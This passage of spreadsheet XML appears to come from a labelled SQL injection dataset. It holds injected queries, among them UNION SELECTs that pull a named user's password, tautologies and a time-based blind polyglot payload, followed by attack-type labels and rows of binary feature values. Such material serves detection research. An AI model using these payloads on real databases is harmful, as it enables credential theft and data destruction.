    <t>SELECT * FROM product WHERE PCategory='' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='ddd' union select username from students --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name=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</si>
  <si>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profiles WHERE ID = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = 'IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>union</t>
  </si>
  <si>
    <t>Two Single Quote</t>
  </si>
  <si>
    <t>Three Single Quote</t>
  </si>
  <si>
    <t>Double Quote</t>
  </si>
  <si>
    <t>PiggyBacked Query</t>
  </si>
  <si>
    <t>SingleLine Comment</t>
  </si>
  <si>
    <t>Semicolon</t>
  </si>
  <si>
    <t>Two Singapore Quote</t>
  </si>
  <si>
    <t>True Case Zero</t>
  </si>
  <si>
    <t>True Case One</t>
  </si>
  <si>
    <t>True Case CharX</t>
  </si>
  <si>
    <t>True Case VarA</t>
  </si>
  <si>
    <t>True Case CharA</t>
  </si>
  <si>
    <t>Multiple Line Comment</t>
  </si>
  <si>
    <t>SET IDENTITY_INSERT</t>
  </si>
  <si>
    <t>TRUNCATE TABLE</t>
  </si>
  <si>
    <t>DROP table</t>
  </si>
  <si>
    <t>UPDATE</t>
  </si>
  <si>
    <t>INSERT into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</si>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</sst>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/>
  <cols>
    <col min="1" max="1" width="63.7109375" style="3" customWidth="1"/>
    <col min="2" max="2" width="6.7109375" style="1" customWidth="1"/>
    <col min="3" max="3" width="5.7109375" style="15" customWidth="1"/>
    <col min="4" max="5" width="6.7109375" style="6" customWidth="1"/>
    <col min="6" max="6" width="6.42578125" style="6" customWidth="1"/>
    <col min="7" max="7" width="5.42578125" style="6" customWidth="1"/>
    <col min="8" max="8" width="5.5703125" style="6" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="6.85546875" style="6" customWidth="1"/>
    <col min="10" max="12" width="5.7109375" style="6" customWidth="1"/>
    <col min="13" max="13" width="10.7109375" customWidth="1"/>
    <col min="14" max="14" width="8.7109375" style="16" customWidth="1"/>
    <col min="15" max="15" width="6.42578125" style="16" customWidth="1"/>
    <col min="16" max="16" width="6.42578125" style="15" customWidth="1"/>
    <col min="17" max="17" width="5.7109375" style="15" customWidth="1"/>
    <col min="18" max="18" width="8.28515625" style="15" customWidth="1"/>
    <col min="19" max="19" width="4.85546875" style="15" customWidth="1"/>
    <col min="20" max="20" width="6.28515625" style="8" customWidth="1"/>
    <col min="21" max="21" width="12" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:21" s="2" customFormat="1" ht="75">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>506</v>
      </c>
      <c r="C1" s="13" t="s">
        <v>507</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>503</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>502</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>508</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>509</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>510</v>
      </c>
      <c r="I1" s="2" t="s">
        <v>511</v>
      </c>
      <c r="J1" s="2" t="s">
        <v>512</v>
      </c>
      <c r="K1" s="2" t="s">
        <v>513</v>
      </c>
      <c r="L1" s="2" t="s">
        <v>504</v>
      </c>
      <c r="M1" s="2" t="s">
        <v>514</v>
      </c>
      <c r="N1" s="13" t="s">
        <v>515</v>
      </c>
      <c r="O1" s="13" t="s">
        <v>516</v>
      </c>
      <c r="P1" s="13" t="s">
        <v>517</v>
      </c>
      <c r="Q1" s="13" t="s">
        <v>518</v>
      </c>
      <c r="R1" s="13" t="s">
        <v>519</v>
      </c>
      <c r="S1" s="13" t="s">
        <v>520</v>
      </c>
      <c r="T1" s="9" t="s">
        <v>501</v>
      </c>
      <c r="U1" s="2" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="2" spans="1:21">
      <c r="A2" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B2" s="1">
        <v>1</v>
      </c>
      <c r="C2" s="14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7">
        <v>1</v>
      </c>
      <c r="U2" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:21">
      <c r="A3" s="4" t="s">
        <v>2</v>
      </c>
      <c r="B3" s="1">
        <v>0</v>
      </c>
      <c r="C3" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U3" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:21">
      <c r="A4" s="4" t="s">
        <v>3</v>
      </c>
      <c r="B4" s="1">
        <v>1</v>
      </c>
      <c r="C4" s="14">
        <v>0</v>
      </c>
      <c r="D4" s="5">
        <v>0</v>
      </c>
      <c r="E4" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U4" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:21">
      <c r="A5" s="4" t="s">
        <v>4</v>
      </c>
      <c r="B5" s="1">
        <v>0</v>
      </c>
      <c r="C5" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U5" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:21">
      <c r="A6" s="4" t="s">
        <v>5</v>
      </c>
      <c r="B6" s="1">
        <v>0</v>
      </c>
      <c r="C6" s="14">
        <v>0</v>
      </c>
      <c r="D6" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U6" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:21" ht="24">
      <c r="A7" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B7" s="1">
        <v>1</v>
      </c>
      <c r="C7" s="14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7">
        <v>0</v>
      </c>
      <c r="U7" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:21">
      <c r="A8" s="4" t="s">
        <v>7</v>
      </c>
      <c r="B8" s="1">
        <v>0</v>
      </c>
      <c r="C8" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U8" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:21" ht="24">
      <c r="A9" s="4" t="s">
        <v>8</v>
      </c>
      <c r="B9" s="1">
        <v>1</v>
      </c>
      <c r="C9" s="1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7">
        <v>1</v>
      </c>
      <c r="U9" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:21">
      <c r="A10" s="4" t="s">
        <v>9</v>
      </c>
      <c r="B10" s="1">
        <v>0</v>
      </c>
      <c r="C10" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U10" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:21" ht="48">
      <c r="A11" s="4" t="s">
        <v>10</v>
      </c>
      <c r="B11" s="1">
        <v>1</v>
      </c>
      <c r="C11" s="14">
        <v>1</v>
      </c>
      <c r="D11" s="5">
        <v>0</v>
      </c>
      <c r="E11" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N11" s="14">
        <v>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7">
        <v>0</v>
      </c>
      <c r="U11" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:21" ht="24">
      <c r="A12" s="4" t="s">
        <v>11</v>
      </c>
      <c r="B12" s="1">
        <v>1</v>
      </c>
      <c r="C12" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N12" s="14">
        <v>0</v>
      </c>
      <c r="O12" s="14">
        <v>1</v>
      </c>
      <c r="P12" s="14">
        <v>0</v>
      </c>
      <c r="Q12" s="14">
        <v>0</v>
      </c>
      <c r="R12" s="14">
        <v>0</v>
      </c>
      <c r="S12" s="14">
        <v>0</v>
      </c>
      <c r="T12" s="7">
        <v>0</v>
      </c>
      <c r="U12" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:21">
      <c r="A13" s="4" t="s">
        <v>12</v>
      </c>
      <c r="B13" s="1">
        <v>1</v>
      </c>
      <c r="C13" s="14">
        <v>0</v>
      </c>
      <c r="D13" s="5">
        <v>0</v>
      </c>
      <c r="E13" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U13" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:21">
      <c r="A14" s="4" t="s">
        <v>13</v>
      </c>
      <c r="B14" s="1">
        <v>1</v>
      </c>
      <c r="C14" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U14" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:21">
      <c r="A15" s="4" t="s">
        <v>14</v>
      </c>
      <c r="B15" s="1">
        <v>0</v>
      </c>
      <c r="C15" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U15" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:21" ht="24">
      <c r="A16" s="4" t="s">
        <v>15</v>
      </c>
      <c r="B16" s="1">
        <v>1</v>
      </c>
      <c r="C16" s="14">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U16" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:21" ht="36">
      <c r="A17" s="4" t="s">
        <v>16</v>
      </c>
      <c r="B17" s="1">
        <v>0</v>
      </c>
      <c r="C17" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U17" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:21">
      <c r="A18" s="4" t="s">
        <v>17</v>
      </c>
      <c r="B18" s="1">
        <v>1</v>
      </c>
      <c r="C18" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N18" s="14">
        <v>0</v>
      </c>
      <c r="O18" s="14">
        <v>0</v>
      </c>
      <c r="P18" s="14">
        <v>1</v>
      </c>
      <c r="Q18" s="14">
        <v>0</v>
      </c>
      <c r="R18" s="14">
        <v>0</v>
      </c>
      <c r="S18" s="14">
        <v>0</v>
      </c>
      <c r="T18" s="7">
        <v>0</v>
      </c>
      <c r="U18" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:21">
      <c r="A19" s="3" t="s">
        <v>18</v>
      </c>
      <c r="B19" s="1">
        <v>0</v>
      </c>
      <c r="C19" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U19" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:21" ht="45">
      <c r="A20" s="3" t="s">
        <v>19</v>
      </c>
      <c r="B20" s="1">
        <v>1</v>
      </c>
      <c r="C20" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N20" s="14">
        <v>0</v>
      </c>
      <c r="O20" s="14">
        <v>0</v>
      </c>
      <c r="P20" s="14">
        <v>0</v>
      </c>
      <c r="Q20" s="14">
        <v>1</v>
      </c>
      <c r="R20" s="14">
        <v>0</v>
      </c>
      <c r="S20" s="14">
        <v>0</v>
      </c>
      <c r="T20" s="7">
        <v>0</v>
      </c>
      <c r="U20" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:21" ht="45">
      <c r="A21" s="3" t="s">
        <v>20</v>
      </c>
      <c r="B21" s="1">
        <v>1</v>
      </c>
      <c r="C21" s="14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7">
        <v>0</v>
      </c>
      <c r="U21" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:21">
      <c r="A22" s="3" t="s">
        <v>21</v>
      </c>
      <c r="B22" s="1">
        <v>1</v>
      </c>
      <c r="C22" s="14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1">
        <v>0</v>
      </c>
      <c r="N22" s="14">
        <v>0</v>
      </c>
      <c r="O22" s="14">
        <v>0</v>
      </c>
      <c r="P22" s="14">
        <v>1</v>
      </c>
      <c r="Q22" s="14">
        <v>0</v>
      </c>
      <c r="R22" s="14">
        <v>0</v>
      </c>
      <c r="S22" s="14">
        <v>0</v>
      </c>
      <c r="T22" s="7">
        <v>0</v>
      </c>
      <c r="U22" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:21" ht="30">
      <c r="A23" s="3" t="s">
        <v>22</v>
      </c>
      <c r="B23" s="1">
        <v>1</v>
      </c>
      <c r="C23" s="14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1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7">
        <v>1</v>
      </c>
      <c r="U23" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:21" ht="30">
      <c r="A24" s="3" t="s">
        <v>23</v>
      </c>
      <c r="B24" s="1">
        <v>0</v>
      </c>
      <c r="C24" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U24" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:21" ht="30">
      <c r="A25" s="3" t="s">
        <v>24</v>
      </c>
      <c r="B25" s="1">
        <v>1</v>
      </c>
      <c r="C25" s="14">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U25" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:21" ht="45">
      <c r="A26" s="3" t="s">
        <v>25</v>
      </c>
      <c r="B26" s="1">
        <v>1</v>
      </c>
      <c r="C26" s="14">
        <v>0</v>
      </c>
      <c r="D26" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U26" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:21" ht="30">
      <c r="A27" s="3" t="s">
        <v>26</v>
      </c>
      <c r="B27" s="1">
        <v>1</v>
      </c>
      <c r="C27" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U27" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:21">
      <c r="A28" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B28" s="1">
        <v>0</v>
      </c>
      <c r="C28" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U28" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:21" ht="45">
      <c r="A29" s="3" t="s">
        <v>28</v>
      </c>
      <c r="B29" s="1">
        <v>1</v>
      </c>
      <c r="C29" s="14">
        <v>1</v>
      </c>
      <c r="D29" s="5">
        <v>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">
        <v>0</v>
      </c>
      <c r="N29" s="14">
        <v>0</v>
      </c>
      <c r="O29" s="14">
        <v>0</v>
      </c>
      <c r="P29" s="14">
        <v>0</v>
      </c>
      <c r="Q29" s="14">
        <v>0</v>
      </c>
      <c r="R29" s="14">
        <v>1</v>
      </c>
      <c r="S29" s="14">
        <v>0</v>
      </c>
      <c r="T29" s="7">
        <v>0</v>
      </c>
      <c r="U29" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:21">
      <c r="A30" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B30" s="1">
        <v>0</v>
      </c>
      <c r="C30" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U30" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:21" ht="30">
      <c r="A31" s="3" t="s">
        <v>30</v>
      </c>
      <c r="B31" s="1">
        <v>0</v>
      </c>
      <c r="C31" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U31" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:21">
      <c r="A32" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B32" s="1">
        <v>0</v>
      </c>
      <c r="C32" s="14">
        <v>0</v>
      </c>
      <c r="D32" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U32" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:21">
      <c r="A33" s="3" t="s">
        <v>32</v>
      </c>
      <c r="B33" s="1">
        <v>1</v>
      </c>
      <c r="C33" s="14">
        <v>0</v>
      </c>
      <c r="D33" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U33" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:21" ht="30">
      <c r="A34" s="3" t="s">
        <v>33</v>
      </c>
      <c r="B34" s="1">
        <v>1</v>
      </c>
      <c r="C34" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U34" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:21" ht="60">
      <c r="A35" s="3" t="s">
        <v>34</v>
      </c>
      <c r="B35" s="1">
        <v>1</v>
      </c>
      <c r="C35" s="14">
        <v>1</v>
      </c>
      <c r="D35" s="5">
        <v>0</v>
      </c>
      <c r="E35" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N35" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U35" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:21">
      <c r="A36" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B36" s="1">
        <v>0</v>
      </c>
      <c r="C36" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U36" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:21" ht="90">
      <c r="A37" s="3" t="s">
        <v>36</v>
      </c>
      <c r="B37" s="1">
        <v>0</v>
      </c>
      <c r="C37" s="14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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U37" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:21" ht="30">
      <c r="A38" s="3" t="s">
        <v>37</v>
      </c>
      <c r="B38" s="1">
        <v>0</v>
      </c>
      <c r="C38" s="1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  <c r="M38" s="1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7">
        <v>0</v>
      </c>
      <c r="U38" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:21" ht="30">
      <c r="A39" s="3" t="s">
        <v>38</v>
      </c>
      <c r="B39" s="1">
        <v>1</v>
      </c>
      <c r="C39" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U39" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:21" ht="30">
      <c r="A40" s="3" t="s">
        <v>39</v>
      </c>
      <c r="B40" s="1">
        <v>1</v>
      </c>
      <c r="C40" s="14">
        <v>0</v>
      </c>
      <c r="D40" s="5">
        <v>0</v>
      </c>
      <c r="E40" s="5">
        <v>0</v>
      </c>
      <c r="F40" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U40" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:21" ht="60">
      <c r="A41" s="3" t="s">
        <v>40</v>
      </c>
      <c r="B41" s="1">
        <v>1</v>
      </c>
      <c r="C41" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N41" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U41" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:21" ht="30">
      <c r="A42" s="3" t="s">
        <v>41</v>
      </c>
      <c r="B42" s="1">
        <v>1</v>
      </c>
      <c r="C42" s="14">
        <v>1</v>
      </c>
      <c r="D42" s="5">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N42" s="14">
        <v>0</v>
      </c>
      <c r="O42" s="14">
        <v>0</v>
      </c>
      <c r="P42" s="14">
        <v>0</v>
      </c>
      <c r="Q42" s="14">
        <v>1</v>
      </c>
      <c r="R42" s="14">
        <v>0</v>
      </c>
      <c r="S42" s="14">
        <v>0</v>
      </c>
      <c r="T42" s="7">
        <v>0</v>
      </c>
      <c r="U42" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:21" ht="30">
      <c r="A43" s="3" t="s">
        <v>42</v>
      </c>
      <c r="B43" s="1">
        <v>0</v>
      </c>
      <c r="C43" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U43" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:21" ht="30">
      <c r="A44" s="3" t="s">
        <v>43</v>
      </c>
      <c r="B44" s="1">
        <v>1</v>
      </c>
      <c r="C44" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U44" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:21">
      <c r="A45" s="3" t="s">
        <v>44</v>
      </c>
      <c r="B45" s="1">
        <v>0</v>
      </c>
      <c r="C45" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U45" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:21" ht="60">
      <c r="A46" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B46" s="1">
        <v>1</v>
      </c>
      <c r="C46" s="14">
        <v>1</v>
      </c>
      <c r="D46" s="5">
        <v>0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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U46" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:21" ht="60">
      <c r="A47" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B47" s="1">
        <v>1</v>
      </c>
      <c r="C47" s="14">
        <v>1</v>
      </c>
      <c r="D47" s="5">
        <v>0</v>
      </c>
      <c r="E47" s="5">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N47" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U47" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:21" ht="30">
      <c r="A48" s="3" t="s">
        <v>47</v>
      </c>
      <c r="B48" s="1">
        <v>1</v>
      </c>
      <c r="C48" s="14"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1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7">
        <v>0</v>
      </c>
      <c r="U48" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:21" ht="30">
      <c r="A49" s="3" t="s">
        <v>48</v>
      </c>
      <c r="B49" s="1">
        <v>1</v>
      </c>
      <c r="C49" s="14">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U49" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:21">
      <c r="A50" s="3" t="s">
        <v>49</v>
      </c>
      <c r="B50" s="1">
        <v>1</v>
      </c>
      <c r="C50" s="1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</v>
      </c>
      <c r="K50" s="5">
        <v>0</v>
      </c>
      <c r="L50" s="5">
        <v>0</v>
      </c>
      <c r="M50" s="1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7">
        <v>0</v>
      </c>
      <c r="U50" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:21" ht="30">
      <c r="A51" s="3" t="s">
        <v>50</v>
      </c>
      <c r="B51" s="1">
        <v>1</v>
      </c>
      <c r="C51" s="14"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1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7">
        <v>1</v>
      </c>
      <c r="U51" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:21" ht="90">
      <c r="A52" s="3" t="s">
        <v>51</v>
      </c>
      <c r="B52" s="1">
        <v>0</v>
      </c>
      <c r="C52" s="1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</v>
      </c>
      <c r="M52" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U52" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:21" ht="30">
      <c r="A53" s="3" t="s">
        <v>52</v>
      </c>
      <c r="B53" s="1">
        <v>1</v>
      </c>
      <c r="C53" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U53" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:21">
      <c r="A54" s="3" t="s">
        <v>53</v>
      </c>
      <c r="B54" s="1">
        <v>1</v>
      </c>
      <c r="C54" s="14">
        <v>0</v>
      </c>
      <c r="D54" s="5">
        <v>0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1</v>
      </c>
      <c r="M54" s="1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7">
        <v>0</v>
      </c>
      <c r="U54" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:21">
      <c r="A55" s="3" t="s">
        <v>54</v>
      </c>
      <c r="B55" s="1">
        <v>1</v>
      </c>
      <c r="C55" s="14">
        <v>0</v>
      </c>
      <c r="D55" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U55" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:21">
      <c r="A56" s="3" t="s">
        <v>55</v>
      </c>
      <c r="B56" s="1">
        <v>1</v>
      </c>
      <c r="C56" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U56" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:21" ht="30">
      <c r="A57" s="3" t="s">
        <v>56</v>
      </c>
      <c r="B57" s="1">
        <v>1</v>
      </c>
      <c r="C57" s="14">
        <v>0</v>
      </c>
      <c r="D57" s="5">
        <v>0</v>
      </c>
      <c r="E57" s="5">
        <v>1</v>
      </c>
      <c r="F57" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U57" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:21">
      <c r="A58" s="3" t="s">
        <v>57</v>
      </c>
      <c r="B58" s="1">
        <v>1</v>
      </c>
      <c r="C58" s="14"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1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7">
        <v>0</v>
      </c>
      <c r="U58" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:21" ht="45">
      <c r="A59" s="3" t="s">
        <v>58</v>
      </c>
      <c r="B59" s="1">
        <v>1</v>
      </c>
      <c r="C59" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N59" s="14">
        <v>0</v>
      </c>
      <c r="O59" s="14">
        <v>0</v>
      </c>
      <c r="P59" s="14">
        <v>0</v>
      </c>
      <c r="Q59" s="14">
        <v>0</v>
      </c>
      <c r="R59" s="14">
        <v>1</v>
      </c>
      <c r="S59" s="14">
        <v>0</v>
      </c>
      <c r="T59" s="7">
        <v>0</v>
      </c>
      <c r="U59" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:21">
      <c r="A60" s="3" t="s">
        <v>59</v>
      </c>
      <c r="B60" s="1">
        <v>0</v>
      </c>
      <c r="C60" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U60" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:21" ht="30">
      <c r="A61" s="3" t="s">
        <v>60</v>
      </c>
      <c r="B61" s="1">
        <v>1</v>
      </c>
      <c r="C61" s="14">
        <v>0</v>
      </c>
      <c r="D61" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U61" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:21" ht="30">
      <c r="A62" s="3" t="s">
        <v>61</v>
      </c>
      <c r="B62" s="1">
        <v>0</v>
      </c>
      <c r="C62" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U62" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:21" ht="30">
      <c r="A63" s="3" t="s">
        <v>62</v>
      </c>
      <c r="B63" s="1">
        <v>1</v>
      </c>
      <c r="C63" s="14">
        <v>0</v>
      </c>
      <c r="D63" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U63" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:21" ht="30">
      <c r="A64" s="3" t="s">
        <v>63</v>
      </c>
      <c r="B64" s="1">
        <v>1</v>
      </c>
      <c r="C64" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U64" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:21">
      <c r="A65" s="3" t="s">
        <v>64</v>
      </c>
      <c r="B65" s="1">
        <v>1</v>
      </c>
      <c r="C65" s="14">
        <v>0</v>
      </c>
      <c r="D65" s="5">
        <v>0</v>
      </c>
      <c r="E65" s="5">
        <v>0</v>
      </c>
      <c r="F65" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U65" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:21" ht="30">
      <c r="A66" s="3" t="s">
        <v>65</v>
      </c>
      <c r="B66" s="1">
        <v>1</v>
      </c>
      <c r="C66" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U66" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:21" ht="30">
      <c r="A67" s="3" t="s">
        <v>66</v>
      </c>
      <c r="B67" s="1">
        <v>1</v>
      </c>
      <c r="C67" s="14">
        <v>0</v>
      </c>
      <c r="D67" s="5">
        <v>0</v>
      </c>
      <c r="E67" s="5">
        <v>0</v>
      </c>
      <c r="F67" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U67" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:21" ht="30">
      <c r="A68" s="3" t="s">
        <v>67</v>
      </c>
      <c r="B68" s="1">
        <v>1</v>
      </c>
      <c r="C68" s="14">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U68" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:21" ht="30">
      <c r="A69" s="3" t="s">
        <v>68</v>
      </c>
      <c r="B69" s="1">
        <v>1</v>
      </c>
      <c r="C69" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U69" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:21">
      <c r="A70" s="3" t="s">
        <v>69</v>
      </c>
      <c r="B70" s="1">
        <v>1</v>
      </c>
      <c r="C70" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U70" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:21">
      <c r="A71" s="3" t="s">
        <v>70</v>
      </c>
      <c r="B71" s="1">
        <v>0</v>
      </c>
      <c r="C71" s="14">
        <v>0</v>
      </c>
      <c r="D71" s="5">
        <v>0</v>
      </c>
      <c r="E71" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U71" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:21" ht="45">
      <c r="A72" s="3" t="s">
